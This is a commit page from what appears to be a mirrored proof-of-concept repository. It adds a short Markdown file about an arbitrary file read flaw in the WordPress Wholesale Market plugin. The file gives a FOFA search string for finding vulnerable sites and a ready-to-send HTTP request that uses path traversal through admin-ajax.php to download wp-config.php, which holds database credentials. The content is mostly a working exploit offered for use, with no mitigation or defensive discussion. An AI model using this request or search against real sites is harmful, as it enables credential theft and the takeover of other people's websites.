mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 16:25:35 +08:00
Create WordPress_Wholesale_Market插件存在任意文件读取漏洞.md
This commit is contained in:
16
WordPress_Wholesale_Market插件存在任意文件读取漏洞.md
Normal file
16
WordPress_Wholesale_Market插件存在任意文件读取漏洞.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## WordPress_Wholesale_Market插件存在任意文件读取漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="wp-content/plugins/wholesale-market"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0
|
||||
Connection: close
|
||||
Accept-Encoding: gzip
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user